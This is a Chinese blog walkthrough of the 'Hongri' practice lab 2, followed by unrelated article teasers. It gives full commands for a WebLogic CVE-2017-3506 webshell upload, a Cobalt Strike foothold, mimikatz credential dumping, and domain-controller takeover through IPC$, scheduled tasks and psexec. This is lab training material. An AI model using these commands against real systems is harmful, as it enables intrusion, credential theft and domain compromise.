红日靶场2

环境搭建

配置ip,web机有两张网卡,我对nat设置为192.168.11.0网段,仅主机为192.168.52.0网段,这三台机子都要改一下ip,官方给出要恢复快照3,恢复的时候有问题,不用恢复没有影响
web机的网络情况如下就可以了
image

在这个目录下启动weblogic服务,以管理员身份运行startWebLogic
C:\Oracle\Middleware\user_projects\domains\base_domain
image

web渗透

ip扫描
nmap -sP 192.168.11.0/24

image
发现80,201两台机器(146为kali)
分别扫描端口服务
192.168.11.80
nmap -sT -Pn 192.168.11.80
image

192.168.11.201

image

发现192.168.11.80下有7001端口很明显的weblogic
工具探测是否有cve漏洞

python WeblogicScan.py -u 192.168.11.80 -p 7001

image

发现有cve-2017-3506
利用exp传马
但是这个马不能用webshell管理工具连接,配代理抓包改成哥斯拉的jsp马(冰蝎,蚁剑都可)

proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell6.jsp

image
修改马

image

image

上传成功

哥斯拉连接成功

image

域渗透

cs上线,将生成的exe后门传到被控机执行
上线成功

image

查看ip网段情况
shell ipconfig /all
image

发现192.168.52.0网段

传fscan扫描
shell fscan.exe -h 192.168.52.0/24
探测发现dc

image

扫描dc发现端口445等
shell fscan.exe -h 192.168.52.10
image

run mimikatz抓到administrator明文密码
image

ipc+计划任务横向
建立连接

shell net use \\192.168.52.10\ipc$ "123.com" /user:administrator

image

复制后门到dc
将被控机设置为中转监听器,用该监听器生成后门

image

image

shell copy 2.exe \\192.168.52.10\C$

image

创建计划任务
shell schtasks /create /s 192.168.52.10 /tn "text" /sc onstart /tr c:\2.exe /ru system /f

image

执行计划任务

shell schtasks /run /s 192.168.52.138 /i /tn "text"

image

上线成功拿下域控

image

同样psexec横向,要用smb监听

image

image
拿下域控

image

还有很多方法不一一赘述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/719482.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C133 线段树分治 CF1681F Unique Occurrences

视频链接:C133 线段树分治 CF1681F Unique Occurrences_哔哩哔哩_bilibili Unique Occurrences - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) Problem - 1681F- Codeforces// 线段树分治 O(nlognlogn) #include <iostream> #include <cstring> #include <al…

P10536 [Opoi 2024] 二十六点 题解

比较直接的做法。 当 \(P_x = 1\) 时显然可以暴力 DP,设 \(f_{x,c}\) 表示 \(x\) 的子树中以 \(c\) 开头的最长不下降子序列的长度。直接转移即可。 \(P_x \neq 1\) 的时候呢?我们发现,所谓“忽略掉这些路径中的第 \(2\) 到第 \(P_x\) 个的点”,代表的就是按照深度转移,大…

数据对标?我搜集了7000+标准数据元分享给你

数据治理工作推进过程中比较关键的一步就是数据标准化,这里的数据标准化是指根据相关规范将数据达成统一技术要求的过程。 我国的主要标准分类包括国家标准、行业标准、地方标准和团体标准、企业标准。我们用的比较多的一般就是国标、行标和企业标准。 一、国家标准 国家标准,…

nrf24L01 check不通过问题分析

下面这段代码是有问题的,使nrf24L01 check不通过。 #include "stm32f10x.h" // Device header#include "spi.h" #include "OLED.h"/****** SPI2引脚连接 ******/ #define PA4_SPI1_NSS GPIO_Pin_4 #define PA5_SPI1_SCK GPIO_Pin_5 #define PA6…

Tiger Lowcode 低代码开发平台、Web前端设计器、LowcodeCore 快速构建API

最近发现一款非常好用的低代码开发平台:Tiger 低代码开发平台:http://www.tigerlowcode.com “Tiger 低代码平台”分为:“Web设计器”和“API设计器”两个部分。“Web设计器”是一个基于“CSS/Jquery/HTML”,用于实现“拖拉拽,所见即所得”的前端框架。“API设计器”是一个…

6.3数组-- 二分查找

704. 二分查找 力扣题目链接 题意描述:给定一个 n 个元素有序的(升序)整型数组 nums 和一个目标值 target ,写一个函数搜索 nums 中的 target,如果目标值存在返回下标,否则返回 -1。这道题目的前提是数组为有序数组,同时题目还强调数组中无重复元素,因为一旦有重复元素…

jarbas

jarbas主机发现和nmap扫描 nmap -sn 192.168.56.0/24靶机ip:192.168.56.104 nmap -sT --min-rate 10000 192.168.56.104PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxynmap -sT -sV -sC -O -p22,80,3306,808…

纷乱繁杂的声明文件

费脑子的声明文件 初始化项目: # 创建项目目录 mkdir hello && cd hello # 生成 package.json npm init -y # 由于是 ts 项目,安装 typescript 包 npm i --save-dev typescript # 生成 tsconfig.json npx tsc --initpackage.json {"name": "@kaoniqiwa…

面试必会-Redis篇

01- 你们项目中哪里用到了Redis ? 在我们的项目中很多地方都用到了Redis , Redis在我们的项目中主要有三个作用 :使用Redis做热点数据缓存/接口数据缓存 使用Redis存储一些业务数据 , 例如 : 验证码 , 用户信息 , 用户行为数据 , 数据计算结果 , 排行榜数据等 使用Redis实现分…

# 费脑子的声明文件

费脑子的声明文件 初始化项目: # 创建项目目录 mkdir hello && cd hello # 生成 package.json npm init -y # 由于是 ts 项目,安装 typescript 包 npm i --save-dev typescript # 生成 tsconfig.json npx tsc --initpackage.json {"name": "@kaoniqiwa…

使用idea提交代码到github时,提交用户显示为以前使用的用户不是当前github用户

在idea使用http的方式拉取代码,并且同样是用http的方式提交的代码。导致出现这个问题,。所以提交和拉取代码最好还是用ssh的方式更为妥当。 只需要修改git上传代码的方式为ssh的方式即可(还需要在idea中登入github账号)修改提交代码的方式-步骤如下点击git在选择[Manage Re…